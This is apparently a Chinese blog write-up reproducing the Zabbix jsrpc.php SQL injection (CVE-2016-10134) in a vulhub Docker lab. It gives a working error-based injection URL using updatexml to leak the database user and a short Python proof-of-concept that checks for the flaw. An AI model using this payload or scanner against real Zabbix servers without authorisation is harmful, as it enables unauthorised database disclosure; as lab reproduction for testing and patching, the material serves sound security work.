zabbix latest.php SQL注入漏洞（CVE-2016-10134）复现，python编写POC

环境搭建：

使用vulhub，进入对应文件夹启动环境：

[root@localhost CVE-2016-10134]# cd /home/vulhub/zabbix/CVE-2016-10134/
[root@localhost CVE-2016-10134]# docker-compose up -d

查看端口：

[root@localhost CVE-2016-10134]# docker ps
ConTAINER ID   IMAGE                        COMMAND                  CREATED          STATUS                             PORTS                                   NAMES
186d17fe3db4   vulhub/zabbix:3.0.3-server   "/docker-entrypoint.…"   37 seconds ago   Up 35 seconds (health: starting)   162/udp, 10051/tcp                      cve-2016-10134_agent_1
61dac6a6b384   vulhub/zabbix:3.0.3-web      "/docker-entrypoint.…"   37 seconds ago   Up 35 seconds (healthy)            0.0.0.0:8080->80/tcp, :::8080->80/tcp   cve-2016-10134_web_1
00cf5df981b0   mysql:5                      "docker-entrypoint.s…"   39 seconds ago   Up 38 seconds                      3306/tcp, 33060/tcp                     cve-2016-10134_mysql_1
[root@localhost CVE-2016-10134]#

漏洞复现：

访问
http://192.168.10.10:8080/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0,user()),0)

POC编写：

import requests


url = "http://192.168.10.10:8080/"

poc = "jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0,md5('wwwq')),0)"

res = requests.get(url + poc)
if "afece6b64dc8eff8b9bd078a5f" in res.text:  #  wwwq  的 md5  值
    print("CVE-2016-10134   存在")

pycharm运行结果：

zabbix latest.php SQL注入漏洞（CVE-2016-10134）复现，python编写POC

Linux相关栏目本月热门文章